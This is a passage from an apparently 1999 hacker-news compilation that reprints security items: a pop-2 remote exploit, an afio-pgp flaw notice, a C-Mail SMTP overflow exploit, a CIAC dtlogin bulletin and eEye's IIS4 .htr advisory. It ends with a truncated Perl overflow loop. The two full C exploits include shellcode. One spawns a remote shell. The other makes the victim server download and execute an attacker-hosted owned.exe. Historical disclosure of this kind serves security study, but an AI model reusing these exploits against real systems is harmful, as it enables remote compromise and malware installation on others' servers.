CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
Counterpane Systems is a six-person consulting firm specializing in
cryptography and computer security. Counterpane provides expert consulting
in: design and analysis, implementation and testing, threat modeling,
product research and forecasting, classes and training, intellectual
property, and export consulting. Contracts range from short-term design
evaluations and expert opinions to multi-year development efforts.
http://www.counterpane.com/
Copyright (c) 1999 by Bruce Schneier
@HWA
107.0 pop.c a pop-2 remote exploit by smiler
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* A pop-2 remote exploit that gives a nobody shell.
* gcc pop.c -o pop -O3 -Wall
* Autodetects what version you're sploiting and adjusts ret position and
* offset accordingly.
* Tested on redhat 5.2, 5.1, 5.0 and 4.2. Probably only really useful
* using it on 5.2 tho, cos the rest will most likely have imap open too.
* NB: To exploit pop-2 you have to take into account the length of both
* the hostname and username(unlike all the pop2 exploits out there).
* - smiler
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned char hellcode[]=
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01"
"\x20\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89"
"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0"
"\xfe\xc0\xcd\x80\xe8\xcf\xff\xff\xff\x0f\x42\x49\x4e\x0f"
"\x53\x48";
struct type {
char *text;
int offset;
int alignment;
};
struct type types[]={
{"4.46",0,0},
{"3.35",0,19},
{"3.44",0,19},
{"2.3(30)",0,19},
{NULL,0,0}};
int pop2_type = 0;
#define RET 0xbffff5b1
void usage(char *prog);
int resolv(char *hname, struct in_addr *addr);
int send_oberflow(int fd, char *host, char *user, int offset);
void run_shell(int fd);
int set_pop_type(char *buf, int n);
int do_connect(struct sockaddr_in *serv);
char temp_pass[20], *password;
int main(int argc, char **argv)
{
int fd,n;
unsigned char buf[2048];
struct sockaddr_in servaddr;
if (argc < 5)
usage(argv[0]);
password = strdup(argv[3]);
bzero(argv[3],strlen(argv[3]));
/* Mask the password from the cmdline =) */
bzero(&servaddr,sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(109);
if (!resolv(argv[4],&servaddr.sin_addr)) {
herror("resolv");
exit(-1);
}
fd = do_connect(&servaddr);
if ((n = recv(fd, buf, 1024, 0)) <= 0) {
perror("recv");
return -1;
}
/* Get the banner */
write(STDOUT_FILENO, buf, n);
set_pop_type(buf,n);
printf("Pop type = %d\n",pop2_type);
/* HELO localhost:dave password */
sprintf(buf, "HELO %s:%s %s\r\n",argv[1],argv[2],password);
send(fd, buf, strlen(buf), 0);
printf("Sleeping\n");
sleep(3);
n = recv(fd, buf, sizeof(buf), 0);
send_oberflow(fd, argv[1], argv[2], argv[4]?atoi(argv[4]):0);
// recv(fd, buf, sizeof(buf), 0);
run_shell(fd);
return 0;
}
void run_shell(int fd)
{
int n;
char recvbuf[1024];
fd_set rset;
while(1) {
FD_ZERO(&rset);
FD_SET(fd, &rset);
FD_SET(STDIN_FILENO, &rset);
select(fd+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(fd, &rset)) {
n = recv(fd, recvbuf, 1024,0);
if (n <= 0){
fprintf(stderr,"Connection closed\n");
return;
}
write(STDOUT_FILENO, recvbuf, n);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
n = read(STDIN_FILENO, recvbuf, 1024);
if (n <= 0) return;
send(fd, recvbuf, n, 0);
}
}
return;
}
int send_oberflow(int fd, char *host, char *user, int offset)
{
unsigned char buf[1050];
int ret,ctr,a = 0;
ret = 1016 - strlen(host) - strlen(user);
ret -= types[pop2_type].alignment;
memset(buf,0x90,sizeof(buf));
memcpy(buf,"FOLD ",5);
for (ctr = ret - strlen(hellcode);ctr < ret; ctr++)
buf[ctr] = hellcode[a++];
*(unsigned long *)(buf + ret) = RET + offset + types[pop2_type].offset;
strcpy(buf + ret + 4,"\r\n");
send(fd, buf, strlen(buf), 0);
return 1;
}
int do_connect(struct sockaddr_in *serv)
{
int fd;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd < 0) {
perror("socket");
exit(-1);
}
if (connect(fd, (struct sockaddr *)serv, 16) < 0) {
perror("connect");
exit(-1);
}
return fd;
}
int set_pop_type(char *buf, int n)
{
int ctr = 0;
buf[n] = 0;
while(types[ctr].text) {
if (strstr(buf,types[ctr].text)) {
pop2_type = ctr;
return 1;
}
ctr++;
}
pop2_type = 0;
return pop2_type;
}
int resolv(char *hname, struct in_addr *addr)
{
struct hostent *res;
if (inet_aton(hname,addr))
return 1;
res = gethostbyname(hname);
if (res == NULL)
return 0;
memcpy((char *)addr,(char *)res->h_addr, sizeof(struct in_addr));
return 1;
}
void usage(char *prog)
{
fprintf(stderr,"Usage: %s "\
" [offset]\n",prog);
exit(-1);
}
@HWA
108.0 afio: security hole in 'afio -P pgp' encrypted archives
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 11 Jun 1999 16:55:30 -0000
From: cezar@CS.NET.PL
To: BUGTRAQ@netspace.org
Subject: (fwd) SECURITY: afio: security hole in 'afio -P pgp' encrypted archives
Hello,
Just found it on comp.os.linux.announce. Sorry if it was already on the list.
cezar
-----BEGIN PGP SIGNED MESSAGE-----
I believe that there are very few people who use afio's -P option for
encrypting afio archive contents with pgp. If you do not use afio,
pgp, or the 'afio -P pgp' option, it is safe to skip this message.
I. Description
Since version 2.4.2, the afio archiver has had an interface, the '-P
pgp' command line option, which can be used to pgp-encrypt the file
data written to an afio archive. Following up on some bug reports, I
have recently discovered a security problem with this afio-pgp
interface: pgp encryption is not always applied in the right way.
This makes it possible to crack the encryption on the file data in an
'encrypted' archive produced using afio with the '-P pgp' option.
The security of files which were already encrypted _before_ being
written to the archive is not affected. The security hole is not in
pgp itself, but in the interaction between afio and pgp. Other
programs which interact with pgp to encrypt things are very unlikely
to have a similar security hole.
II. Impact
It is possible to crack the encryption of at least some of
the file data in the 'encrypted' archives produced using 'afio -P
pgp'. This includes archives produced using the pgp_write example
script included in the afio distribution.
The attack against the broken archive encryption is obscure, but not
impossible to find. The next version of afio (due out in 1-n
months) will fix the security bug. By reverse-engineering the bug
fix, it will be easier to find the attack. So the release of the
next afio version will make already-existing 'afio -P pgp' archives
more vulnerable.
III. Solution
_Existing archives_ produced with 'afio -P pgp' should really be
treated with the same care (against theft etc.) as unencrypted
archives. If such existing archives cannot be deleted or safely
locked away, then encrypting the _entire_ existing archive file with
pgp will protect it. Such completely encrypted archives will _not_ be
fault-tolerant against storage media errors, like normal afio
archives are.
_New archives_ which really need to be protected with encryption can
be made by having afio output the archive to stdout and piping this
output through pgp: 'find [options] | afio -o [options] - | pgp
[options] >device_or_file'. Such encrypted archives will _not_ be
fault-tolerant against storage media errors, like normal afio
archives are.
The next version of afio (due out in 1-n months) will fix this
security hole by which 'afio -P pgp' creates unsafe archives.
On a personal note: I don't use PGP myself, and am not an expert in
dealing with security bugs. Obviously, reporting the existence of the
bug makes existing archives more vulnerable. Before I get flamed for
handling this in entirely the wrong way: yes, I did ask some experts
first, and this procedure is what came out.
Koen. (current afio maintainer)
- --
This article has been digitally signed by the moderator, using PGP.
http://www.iki.fi/mjr/cola-public-key.asc has PGP key for validating signature.
Send submissions for comp.os.linux.announce to: linux-announce@news.ornl.gov
PLEASE remember a short description of the software and the LOCATION.
This group is archived at http://www.iki.fi/mjr/linux/cola.html
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: latin1
iQCVAgUBN2A06FrUI/eHXJZ5AQFliAQAiY+ViFPj6ADX323dVh2P/H1BBD7lBs/8
pR+JYYNReWqmr75Nvx33KtxGjlZmr/DG5cLp6Wb91RD4Xj2qZQkpoEUq5BjjkGFh
6kUKBD49Z6G3XDEzlGUH1UBchvnB8zBTTHMG4T1KzL0xkXBDIn1GjrLNZSOiMyAs
g1koMsqZANk=
=yXea
-----END PGP SIGNATURE-----
-- end of forwarded message --
--
cezar
CYBER Service / PKFL
@HWA
109.0 C-Mail SMTP Server Remote Buffer Overflow Exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 16 Jun 1999 16:42:43 -0400
From: pw
To: BUGTRAQ@netspace.org
Subject: C-Mail SMTP Server Remote Buffer Overflow Exploit
This is an exploit for a buffer overflow in the C-Mail SMTP Server
which recently had an advisory posted for it by the Eeye Digital Security Team. I
would like to thank them for telling me about the vulnerability before it was
released.
Everything is standard in the exploit except that the shellcode is placed
before the return address on the buffer, because there isn't enough room after it.
To execute the shellcode we put a small stub of code after our return address and
have the return address point to a jmp esp. The small stub of code when executed
points ecx to our shellcode and jumps to it. We can do this because ecx will
always point to the start of our shellcode's original buffer before its copied at
overflow time (at least in this version). This has been tested with only one
version of C-Mail, unfortunately I don't have the version number written down and
my evaluation period is up :). I can say that it is the version which was being
distributed from their web site about 2 months ago. There are return addresses in
the following exploit which should work under win95, 98 and NT. To
compile it under win32 just remove the "#define UNIX".
-mcp
<---------------------------CUT HERE------------------------>
#define UNIX
#ifndef UNIX
#include
#include
#include
#include
#define CLOSE _close
#define SLEEP Sleep
#else
#include
#include
#include
#include
#include
#include
#include
#define CLOSE close
#define SLEEP sleep
#endif
/*
CMail Exploit by _mcp_
Sp3 return address and win32 porting by acpizer
*/
const unsigned long OFFSET = 635;
const unsigned long LENGTH = 650;
const unsigned long CODEOFFSET = 11;
char code[] =
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x5B\xC1\xE3\x10\x66\xBB"
"\x18\x79\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
"\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x5B\xC1\xE3"
"\x10\x66\xBB\x44\x79\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
"\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
"\xC9\x51\x51\x51\x51\x51\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
"\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
"\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
"\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
"\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
"\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
"\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
"\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
"\x30\x00";
/*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] =
"\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1";
/*
Below is:
add ecx, 10
jmp ecx
We use this to transfer to our code that we store before the return address on
our overflow buffer, We have to do this because there isn't near enough room
behind the return address to include the code. If we weren't lucky enough to have
a register pointing virtually right to our code we could include a routine that
searches memory for specific dword in a specific direction relative to a
register's value then transfers control to our code located there. The code can
also be easyly snuck in on another buffer by doing this.
*/
char controlcode[] =
"\x83\xc1\x0A\xFF\xE1";
unsigned int getip(char *hostname)
{
struct hostent *hostinfo;
unsigned int binip;
hostinfo = gethostbyname(hostname);
if(!hostinfo)
{
printf("cant find: %s\n",hostname);
exit(0);
}
#ifndef UNIX
memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
#else
bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length);
#endif
return(binip);
}
int usages(char *fname)
{
printf("Remote Buffer Overflow exploit v1.2 by _mcp_ .\n");
printf("Win32 Porting and nt sp3 address By Acpizer \n");
printf("Usages: \n");
printf("%s \n", fname);
printf("win98:\n");
printf(" = 0xBFF79243\n");
printf("NT SP3:\n");
printf(" = 0x77E53FC7\n");
printf("NT SP4:\n");
printf(" = 0x77E9A3A4\n");
printf("Will make running CSMMail download, save, and\n");
printf("execute http:///~pw/owned.exe\n");
exit(0);
}
main (int argc, char *argv[])
{
int sock,targethost,sinlen;
struct sockaddr_in sin;
static unsigned char buffer[20000];
unsigned char *ptr,*ptr2;
unsigned long ret_addr;
int len,x = 1;
unsigned long rw_mem;
#ifndef UNIX
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0) exit(1);
#endif
if (argc < 4) usages(argv[0]);
targethost = getip(argv[1]);
len = strlen(argv[2]);
if (len > 60)
{
printf("Bad http format!\n");
usages(argv[0]);
}
ptr = argv[2];
while (x <= len)
{
x++;
(*ptr)++; /*Encrypt the http ip for later parsing */
ptr++;
}
if( (sscanf(argv[3],"0x%x",(unsigned long *) &ret_addr)) == 0)
{
printf("Input error, the return address has incorrect format\n");
exit(0);
}
sock = socket(AF_INET,SOCK_STREAM,0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = targethost;
sin.sin_port = htons(25);
sinlen = sizeof(sin);
printf("Starting to create the egg\n");
ptr = (char *)&buffer;
strcpy(ptr,"VRFY ");
ptr+=5;
memset((void *)ptr, 0x90, 7000);
ptr2=ptr;
ptr2+=OFFSET;
memcpy ((void *) ptr2,(void *)&ret_addr, 4);
ptr2+=8;
/* Put the code on the stack that transfers control to our code */
memcpy((void *) ptr2, (void *)&controlcode, (sizeof(controlcode)-1) );
ptr2=ptr;
ptr2+=LENGTH;
(*ptr2)=0x00;
ptr+=CODEOFFSET;
memcpy((void *) ptr,(void *)&code,strlen(code));
(char *) ptr2 = strstr(ptr,"\xb1");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2++;
(*ptr2)+= len + ( sizeof(dir) );
(char *) ptr2 = strstr(ptr,"\x83\xc6");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2+= 2;
(*ptr2)+= len + 8;
ptr+=strlen(code);
memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http
site's info */
ptr+=len;
memcpy((void *) ptr,(void*) &dir, (sizeof(dir)-1) );
printf("Made the egg\n");
if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
{
perror("error:");
exit(0);
}
printf("Connected.\n");
#ifndef UNIX
send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
send(sock,"\r\n",2,0);
#else
write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char
*)&buffer */
write(sock,"\r\n",2);
#endif
SLEEP(1);
printf("Sent the egg\n");
#ifndef UNIX
WSACleanup();
#endif
CLOSE(sock);
exit(1);
}
@HWA
110.0 CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 11 Jun 1999 11:11:10 -0700 (PDT)
From: CIAC Mail User
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability
[ For Public Release ]
-----BEGIN PGP SIGNED MESSAGE-----
__________________________________________________________
The U.S. Department of Energy
Computer Incident Advisory Capability
___ __ __ _ ___
/ | /_\ /
\___ __|__ / \ \___
__________________________________________________________
INFORMATION BULLETIN
Tru64/Digital UNIX (dtlogin) Security Vulnerability
June 10, 1999 21:00 GMT Number J-044
______________________________________________________________________________
PROBLEM: There is a potential vulnerability with the
/usr/dt/bin/dtlogin in Compaq's Tru64/DIGITAL UNIX
software, where under certain circumstances, a user
may gain unauthorized access as superuser.
PLATFORM: Systems running Tru64/DIGITAL UNIX V4.0B,
V4.0D, V4.0E and V4.0F.
DAMAGE: Under certain circumstances, a user may gain
unauthorized access as superuser.
SOLUTION: Apply the vendor-supplied patch.
______________________________________________________________________________
VULNERABILITY The risk is high due to the possibility of gaining a root
ASSESSMENT: compromise.
______________________________________________________________________________
[ Start Compaq Computer Corporation Advisory ]
________________________________________________________
UPDATE: May 11, 1999
TITLE: Tru64/DIGITAL UNIX V4.0b, V4.0d, V4.0e and V4.0f
Potential Security Vulnerability
ref#: SSRT0600U "dtlogin"
SOURCE: Compaq Computer Corporation
Software Security Response Team
"Compaq is broadly distributing this Security Advisory in order
to bring to the attention of users of Compaq products the
important security information contained in this Advisory.
Compaq recommends that all users determine the applicability of
this information to their individual situations and take
appropriate action.
Compaq does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently,
Compaq will not be responsible for any damages resulting from
user's use or disregard of the information provided in this
Advisory."
- -----------------------------------------------------------------------
IMPACT:
Compaq has discovered a potential vulnerability with the
/usr/dt/bin/dtlogin in Compaq's Tru64/DIGITAL UNIX software,
where under certain circumstances, a user may gain unauthorized
access as superuser.
- -----------------------------------------------------------------------
RESOLUTION:
This potential security problem has been resolved and a
patch for this problem has been made available for
Tru64/DIGITAL UNIX V4.0B, V4.0D, V4.0E and V4.0F.
Systems with enhanced security enabled and one or more of
the products listed below, should install this patch immediately.
- Distributed Computing Environment (DCE) from Compaq
- - Advanced Server for Digital UNIX (ASDU) from Compaq
- - AFS Enterprise File Systems from Transarc
- - Kerberos 4 Network Authentication Protocol from MIT
If you need this patch for V4.0, V4.0A or V4.0C, please contact
your normal Compaq Services support channel.
*This solution will be included in a future distributed release of
Compaq's Tru64/DIGITAL UNIX.
This patch may be obtained from the World Wide Web at the
following FTP address:
http://www.service.digital.com/patches
Use the FTP access option, select DIGITAL_UNIX directory,
then choose the appropriate version directory and
download the patch accordingly.
Note: [1] The appropriate patch kit must be installed
following any upgrade to V4.0b, V4.0d, V4.0e or V4.0f.
[1a] These patches may be used on any patch kit/base level.
[2] IMPORTANT - Please review all README and
release notes which are related to this patch or an
official patch kit, prior to installation of this patch.
Additional Considerations:
This patch updates the following component:
/usr/dt/bin/dtlogin
If you believe you have, or aren't sure if you have, previously
installed a patch to this module you should contact your
normal Compaq Service channel.
Also, if you need further information, please contact your normal
Compaq Services support channel.
Compaq appreciates your cooperation and patience. We regret any
inconvenience applying this information may cause.
As always, Compaq urges you to periodically review your system
management and security procedures.
Compaq will continue to review and enhance the security
features of its products and work with customers to maintain and
improve the security and integrity of their systems.
________________________________________________________
Copyright (c) Compaq Computer Corporation, 1999 All
Rights Reserved.
Unpublished Rights Reserved under the Copyright Laws Of
The United States.
________________________________________________________
[ End Compaq Computer Corporation Advisory ]
______________________________________________________________________________
CIAC wishes to acknowledge the Compaq Computer Corporation for the information
contained in this bulletin.
______________________________________________________________________________
For additional information or assistance, please contact CIAC:
CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.
CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov
For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), use one of the following methods to contact CIAC:
1. Call the CIAC voice number 925-422-8193 and leave a message, or
2. Call 888-449-8369 to send a Sky Page to the CIAC duty person or
3. Send e-mail to 4498369@skytel.com, or
4. Call 800-201-9288 for the CIAC Project Leader.
Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.
World Wide Web: http://www.ciac.org/
(or http://ciac.llnl.gov)
Anonymous FTP: ftp.ciac.org
(or ciac.llnl.gov)
Modem access: +1 (925) 423-4753 (28.8K baud)
+1 (925) 423-3331 (28.8K baud)
CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector
(SPI) software updates, new features, distribution and
availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the
use of SPI products.
Our mailing lists are managed by a public domain software package
called Majordomo, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
ciac-bulletin, spi-announce OR spi-notes for list-name:
E-mail to ciac-listproc@llnl.gov or majordomo@rumpole.llnl.gov:
subscribe list-name
e.g., subscribe ciac-bulletin
You will receive an acknowledgment email immediately with a confirmation
that you will need to mail back to the addresses above, as per the
instructions in the email. This is a partial protection to make sure
you are really the one who asked to be signed up for the list in question.
If you include the word 'help' in the body of an email to the above address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.
PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.
This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.
LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services
J-037: W97M.Melissa Word Macro Virus
J-038: HP-UX Vulnerabilities (hpterm, ftp)
J-039: HP-UX Vulnerabilities (MC/ServiceGuard & MC/LockManager, DES
J-040: HP-UX Security Vulnerability in sendmail
J-041: Cisco IOS(R) Software Input Access List Leakage with NAT
J-042: Web Security
J-043: (bulletin in process)
-----BEGIN PGP SIGNATURE-----
Version: 4.0 Business Edition
iQCVAwUBN2E1nLnzJzdsy3QZAQGZWAP+LLkyHUQVu8iWeoAh8XMUNy+vEl0ysRFI
iuSI9J+O/gTFwLMPugKeYOvFrLUs1/EPM4YH8zduPQHyMk/+0s2Jz3icj13d3Oc5
9SRB1vAYtridVzjAU1XwXUj8xzzdyx//8qSygt69tfJm1kEweR70AAXwUhGY2pus
kZ2eTla3ldU=
=h3+v
-----END PGP SIGNATURE-----
@HWA
111.0 The IIS4 eEye security advisory and threads as mentioned previously
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Retina vs. IIS4, Round 2, KO
eEye - Digital Security Team (eeye@EEYE.COM)
Tue, 15 Jun 1999 12:18:16 -0000
Retina vs. IIS4, Round 2
Systems Affected:
Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4
Release Date:
June 8, 1999
Advisory Code:
AD06081999
Description:
We have been debating how to start out this advisory. How do you explain
that 90% or so of the Windows NT web servers on the Internet are open to a
hole that lets an attacker execute arbitrary code on the remote web server?
So the story starts...
The Goal:
Find a buffer overflow that will affect 90% of the Windows NT web servers on
the Internet. Exploit this buffer overflow.
The Theory:
There will be overflows in at least one of the default IIS filtered
extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit will take
place is that IIS will pass the full URL to the DLL that handles the
extension. Therefore if the ISAPI DLL does not do proper bounds checking it
will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to
execute arbitrary code on the remote server.
Entrance Retina:
At the same time of working on this advisory we have been working on the AI
mining logic for Retina's HTTP module. What better test scenario than this?
We gave Retina a list of 10 or so extensions common to IIS and instructed it
to find any possible holes relating to these extensions.
The Grind:
After about an hour Retina found what appeared to be a hole. It displayed
that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server.
We all crossed our fingers, started up the good ol' debugger and had Retina
hit the server again.
Note: [overflow] is 3k or so characters... but we will not get into the
string lengths and such here. View the debug info and have a look for
yourself.
The Registers:
EAX = 00F7FCC8 EBX = 00F41130
ECX = 41414141 EDX = 77F9485A
ESI = 00F7FCC0 EDI = 00F7FCC0
EIP = 41414141 ESP = 00F4106C
EBP = 00F4108C EFL = 00000246
Note: Retina was using "A" (0x41 in hex) for the character to overflow with.
If you're not familiar with buffer overflows a quick note would be that
getting our bytes into any of the registers is a good sign, and directly
into EIP makes it even easier :)
Explain This:
The overflow is in relation to the .HTR extensions. IIS includes the
capability to allow Windows NT users to change their password via the web
directory /iisadmpwd/. This feature is implemented as a set of .HTR files
and the ISAPI extension file ISM.DLL. So somewhere along the line when the
URL is passed through to ISM.DLL, proper bounds checking is not done and our
overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default
on IIS4 servers. Looks like we got our 90% of the Windows NT web servers
part down. However, can we exploit this?
The Exploit:
Yes. We can definitely exploit this and we have. We will not go into much
detail here about how the buffer is exploited and such. Read the comments in
the asm file for more information. However, one nice thing to note is that
the exploit has been crafted in such a way to work on SP4 and SP5 machines,
therefore there is no guessing of offsets and possible accidental crashing
of the remote server. We have not tested the exploit on SP3 and would love
to know if it works or not. eMail alert@eEye.com if you've successfully
exploited this hole on SP3.
For more details about the exploit visit the eEye web site at www.eEye.com
The Fallout:
Almost 90% of the Windows NT web servers on the Internet are affected by
this hole. Everyone from NASDAQ to the U.S. Army to Microsoft themselves.
No, we did not try it on the above mentioned. But it is easy to verify if a
web server is exploitable without using the exploit. Even a server that's
locked in a guarded room behind a Cisco Pix can be broken into with this
hole. This is a reminder to all software vendors that testing for common
security holes in your software is a must. Demand more from your software
vendors.
The Request. (Well one anyway.)
Dear Microsoft,
One of the things that we found out is that IIS did not log any trace of our
attempted hack. We recommend that you pass all server requests to the
logging service before passing it to any ISAPI filters etc...The logging
service should be, as named, an actual service running in a separate memory
space so that when inetinfo goes down intrusion signatures are still logged.
Retina vs. IIS4, Round 2. KO.
Fixes:
1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has just
updated their checklist to include this interim fix.
http://microsoft.com/security/products/iis/CheckList.asp
2. Apply the patch supplied by Microsoft when available.
http://microsoft.com/security
Vendor Status:
We contacted Microsoft on June 8th 1999, eEye Digital Security Team provided
all information needed to reproduce the exploit. and how to fix it.
Microsoft security team did confirm the exploit and are releasing a patch
for IIS.
Related Links
Advisory - On our web site
http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
Advisory - Retina Brain File used to uncover the hole
http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html
Retina - The Network Security Scanner
http://www.eEye.com/retina/
Greetings go out to:
The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN
and any other security company or organization that believes in full
disclosure.
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
Disclaimer:
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
www.eEye.com
--------------------------------------------------------------------------------
Date: Tue, 15 Jun 1999 18:23:28 -0000
From: eEye - Digital Security Team
Subject: Update to IIS Remote Hole.
We have updated our advisory on our website,
http://www.eeye.com/database/advisories/ad06081999/ad06081999.html
and as promised added a link to the working remote exploit,
http://www.eeye.com/database/advisories/ad06081999/ad06081999-exploit.html
Signed,
eEye Digital Security Team
http://www.eEye.com
--------------------------------------------------------------------------------
Re: Retina vs. IIS4, Round 2, KO
Ryan R Permeh (rrpermeh@RCONNECT.COM)
Tue, 15 Jun 1999 17:01:23 -0500
tested, this works for me... scripting was turned on... perl exploit
code follows:
#!/usr/bin/perl
#props to the absu crew
use Net::Telnet;
for ($i=2500;$i<3500;$i++)
{
$obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);
my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";
